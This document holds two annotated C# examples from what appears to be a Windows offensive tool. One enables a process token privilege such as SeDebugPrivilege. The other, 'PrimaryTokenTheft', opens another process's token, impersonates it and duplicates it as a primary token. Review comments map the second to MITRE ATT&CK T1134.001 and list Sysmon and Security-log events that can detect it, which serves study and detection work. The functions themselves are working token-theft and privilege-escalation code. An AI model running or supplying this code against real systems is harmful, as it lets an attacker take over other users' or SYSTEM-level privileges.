Example #1
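 /// <summary>
 /// Ensures the named privilege is enabled in the current process's access token.
 /// </summary>
 /// <remarks>
 /// The token is first queried with PrivilegeCheck; AdjustTokenPrivileges is only
 /// called when the privilege is not already enabled. A privilege that is not
 /// present in the token cannot be enabled, and that case is reported as a failure.
 /// For defenders: a successful adjustment can be recorded as Security event 4703
 /// (token right adjusted) when that audit subcategory is enabled.
 /// </remarks>
 /// <param name="priv">Privilege name passed to LookupPrivilegeValue, e.g. "SeDebugPrivilege".</param>
 /// <returns>
 /// <c>true</c> if the privilege was already enabled or was enabled by this call;
 /// <c>false</c> otherwise (the Win32 error code is written to the console).
 /// </returns>
 public static bool AdjustTokenPrivilege(string priv)
 {
     // AdjustTokenPrivileges returns TRUE even when the requested privilege is not
     // held by the token; the only signal is last-error == ERROR_NOT_ALL_ASSIGNED.
     const int ErrorNotAllAssigned = 1300;

     Pinvoke.PTOKEN_PRIVILEGES tPriv;
     IntPtr hProc   = Pinvoke.GetCurrentProcess();
     IntPtr tHandle = IntPtr.Zero;
     int    lastError;

     // NOTE(review): tHandle is never closed on any path. No CloseHandle wrapper is
     // visible in this listing, so the leak is flagged here rather than fixed.
     if (Pinvoke.OpenProcessToken(hProc, Pinvoke.TOKEN_ADJUST_PRIVILEGES | Pinvoke.TOKEN_QUERY, ref tHandle))
     {
         tPriv.Count = 1;
         tPriv.Luid  = 0;
         tPriv.Attr  = Pinvoke.SE_PRIVILEGE_ENABLED;

         // An unknown privilege name must stop here instead of continuing with LUID 0.
         if (Pinvoke.LookupPrivilegeValue(null, priv, ref tPriv.Luid))
         {
             Pinvoke.PRIVILEGE_SET privs = new Pinvoke.PRIVILEGE_SET {
                 Privilege = new Pinvoke.LUID_AND_ATTRIBUTES[1], Control = Pinvoke.PRIVILEGE_SET.PRIVILEGE_SET_ALL_NECESSARY, PrivilegeCount = 1
             };
             privs.Privilege[0].Luid       = tPriv.Luid;
             privs.Privilege[0].Attributes = Pinvoke.LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED;

             // If PrivilegeCheck itself fails, privCheck stays false and the
             // adjustment below is attempted anyway (same as the original flow).
             bool privCheck;
             Pinvoke.PrivilegeCheck(tHandle, ref privs, out privCheck);
             if (privCheck)
             {
                 Console.WriteLine("[+] Process token already have '{0}'!", priv);
                 return true;
             }

             Console.WriteLine("[*] Trying to adjust token for privilege '{0}'!", priv);
             bool adjusted = Pinvoke.AdjustTokenPrivileges(tHandle, false, ref tPriv, 0, IntPtr.Zero, IntPtr.Zero);

             // Read the error code immediately, before any other call can overwrite it.
             // Assumes the P/Invoke declaration sets SetLastError = true - TODO confirm.
             lastError = Marshal.GetLastWin32Error();
             if (adjusted && lastError != ErrorNotAllAssigned)
             {
                 Console.WriteLine("[+] Success adjusting privilege to '{0}'!", priv);
                 return true;
             }
         }
         else
         {
             lastError = Marshal.GetLastWin32Error();
         }
     }
     else
     {
         lastError = Marshal.GetLastWin32Error();
     }

     // The former catch block only did `throw ex;`, which discarded the original stack
     // trace; exceptions now propagate to the caller unchanged.
     Console.WriteLine("[-] Error adjusting privilege {0}", lastError);
     return false;
 }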
Example #2
        /// <summary>
        /// Opens the process identified by <paramref name="pid"/>, opens its access token,
        /// impersonates it on the calling thread and duplicates it as a primary token.
        /// </summary>
        /// <remarks>
        /// This call sequence corresponds to MITRE ATT&amp;CK T1134.001 (Token Impersonation/Theft).
        /// Telemetry that can surface it: a cross-process handle open on the target process
        /// (for example Sysmon event 10, ProcessAccess) followed by token duplication in the caller.
        /// NOTE(review): neither the process handle nor the source token handle is closed, and the
        /// process handle is requested as inheritable (second OpenProcess argument is true), so it
        /// may be passed on to child processes.
        /// NOTE(review): after ImpersonateLoggedOnUser succeeds the calling thread stays in the
        /// impersonated context; no revert call is visible in this listing.
        /// </remarks>
        /// <param name="pid">Identifier of the process whose token is duplicated.</param>
        /// <returns>The duplicated primary token handle, or <see cref="IntPtr.Zero"/> if any step fails.</returns>
        public static IntPtr PrimaryTokenTheft(int pid)
        {
            IntPtr duplicatedToken = IntPtr.Zero;
            IntPtr sourceToken     = IntPtr.Zero;
            IntPtr processHandle   = Pinvoke.OpenProcess(Pinvoke.ProcessAccessFlags.QueryInformation, true, pid);

            // Each step runs only if the previous one succeeded (short-circuit &&),
            // in the same order as the nested ifs this replaces.
            // The literal 2 passed to DuplicateTokenEx is the impersonation level
            // (SecurityImpersonation in the Win32 SECURITY_IMPERSONATION_LEVEL enum).
            bool succeeded =
                processHandle != IntPtr.Zero
                && Pinvoke.OpenProcessToken(processHandle, Pinvoke.TOKEN_DUPLICATE | Pinvoke.TOKEN_ASSIGN_PRIMARY | Pinvoke.TOKEN_QUERY, ref sourceToken)
                && Pinvoke.ImpersonateLoggedOnUser(sourceToken)
                && Pinvoke.DuplicateTokenEx(sourceToken, Pinvoke.TOKEN_ADJUST_DEFAULT | Pinvoke.TOKEN_ADJUST_SESSIONID | Pinvoke.TOKEN_QUERY | Pinvoke.TOKEN_DUPLICATE | Pinvoke.TOKEN_ASSIGN_PRIMARY, IntPtr.Zero, 2, Pinvoke.TOKEN_TYPE.TokenPrimary, out duplicatedToken);

            if (!succeeded)
            {
                // One message covers every failure point; the error code is the only discriminator.
                Console.WriteLine("[-] Error impersonating process token! ({0})", Marshal.GetLastWin32Error());
                return IntPtr.Zero;
            }

            Console.WriteLine("[+] Success duplicating primary token!");
            return duplicatedToken;
        }